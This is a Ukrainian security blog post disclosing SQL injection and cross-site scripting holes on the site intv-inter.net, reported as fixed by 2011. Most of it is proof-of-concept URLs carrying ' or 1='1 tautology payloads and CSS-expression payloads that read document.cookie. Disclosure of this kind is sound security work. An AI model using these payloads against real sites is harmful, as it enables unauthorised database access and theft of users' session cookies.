Websecurity - Веб безпека

18.05.2009

У вересні, 17.09.2008, я знайшов SQL Injection та Cross-Site Scripting уразливості на проекті http://intv-inter.net. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

23.12.2011

SQL Injection:

http://intv-inter.net/tv/programm/?id=7429146&act=tvp&channel='%20or%201='1
http://intv-inter.net/tv/programm/?id=7429146&act='%20or%201='1&channel=1plus1
http://intv-inter.net/radio/ch/?id=-1'%20or%201='1
http://intv-inter.net/tv/channel/intv/?id=-1%20or%201=1

XSS (IE):

http://intv-inter.net/tv/programm/?id=7429146&act=tvp&channel='style='xss:expression(alert(document.cookie))
http://intv-inter.net/tv/programm/?id=7429146&act='style='xss:expression(alert(document.cookie))'&channel=1plus1
http://intv-inter.net/tv/programm/?id='style='xss:expression(alert(document.cookie))'&act=tvp&channel=1plus1

Дані уразливості вже виправлені шляхом заміни движка сайта. Змінили один дірявий движок на інший дірявий (про уразливості в DLE я вже писав неодноразово).

This entry was posted on 17:26 23.12.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.